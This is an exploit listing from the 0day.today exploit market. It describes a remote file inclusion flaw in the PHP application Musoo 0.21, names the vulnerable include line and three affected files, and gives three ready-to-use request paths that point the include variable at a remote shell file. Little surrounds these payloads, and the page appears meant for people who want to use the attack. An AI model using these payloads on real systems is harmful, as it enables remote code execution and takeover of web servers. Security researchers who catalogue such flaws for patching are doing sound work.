[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Musoo 0.21 Remote File Inclusion Vulnerabilities

Author
GoLd_M
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1960
Category
web applications
Date add
19-06-2007
Platform
unsorted
================================================
Musoo 0.21 Remote File Inclusion Vulnerabilities
================================================




# Musoo 0.21(GLOBALS[ini_array][EXTLIB_PATH])Remote File Include

# D.Script: 
      http://osx.freshmeat.net/redir/musoo/65735/url_tgz/musoo-0.21.tar.gz

# V.Code :
      require_once( $GLOBALS["ini_array"]["EXTLIB_PATH"].'/

# In :
      /msDb.php
      /modules/MusooTemplateLite.php
      /modules/SoundImporter.php

# Exploits:
      1:/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?
      2:/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?
      3:/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=Shell.txt?

# Video
      http://norcalvex.org/v1d30/Musoo/Musoo-Video.rar

# Discovered by: 
      GoLd_M = [Mahmood_ali]




#  0day.today [2024-12-25]  #